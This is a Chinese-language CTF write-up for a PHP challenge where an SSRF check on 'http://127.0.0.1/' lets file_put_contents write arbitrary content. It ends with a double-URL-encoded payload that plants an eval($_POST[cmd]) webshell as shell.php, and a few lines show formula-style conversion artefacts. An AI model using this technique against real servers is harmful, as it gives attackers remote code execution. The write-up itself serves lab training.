Challenge_15

if(isset($_GET) && !empty($_GET)){
    $url = $_GET['file'];
    $path = 'upload/'.$_GET['path'];

传入两个参数
file=
path=
path会拼接上传的路径 $path{=}^{\prime }upload{/}^{\prime }.$_GET[‘path’];

主要代码是这里

if(strpos($url,'http://127.0.0.1/') === 0){
    file_put_contents($path, file_get_contents($url));
    echo "console.log($path update successed!)";

函数解析 ：

strpos() f函数查找字符串在另一字符串中第一次出现的位置（区分大小写）。
**注释：**strpos() 函数是区分大小写的。
**注释：**该函数是二进制安全的。
相关函数：

• strrpos() - 查找字符串在另一字符串中最后一次出现的位置（区分大小写）
• stripos()- 查找字符串在另一字符串中第一次出现的位置（不区分大小写）
• strripos() -查找字符串在另一字符串中最后一次出现的位置（不区分大小写）

语法

strpos(string,find,start)

---

所以file开头要等于 http://127.0.0.1/

file_put_contents() 函数把一个字符串写入文件中。
该函数访问文件时，遵循以下规则：

1. 如果设置了 FILE_USE_INCLUDE_PATH，那么将检查 filename 副本的内置路径
2. 如果文件不存在，将创建一个文件
3. 打开文件
4. 如果设置了 LOCK_EX，那么将锁定文件
5. 如果设置了 FILE_APPEND，那么将移至文件末尾。否则，将会清除文件的内容
6. 向文件中写入数据
7. 关闭文件并对所有文件解锁

如果成功，该函数将返回写入文件中的字符数。如果失败，则返回 False。

file_get_contents() 把整个文件读入一个字符串中。
该函数是用于把文件的内容读入到一个字符串中的首选方法。如果服务器操作系统支持，还会使用内存映射技术来增强性能。

所以

file_put_contents($path,fil{e}_{g}e{t}_{c}ontents($url));

这个代码的意思是，从$url获取内容然后写入$path中

先输入一个file

出现logsole.log 但是没有路径
再输入第二个参数 path

他就会吧file 写入到1.php

利用ssrf的原理
构造payload

但是这里还要经过二次url编码
是path的内容进行二次编码

http://localhost:23125/?file=http://127.0.0.1/index.php?file=http://127.0.0.1/%26path=%253C%253Fphp%2520eval(%2524_POST%255Bcmd%255D)%253B%2520%253F%253E&path=shell.php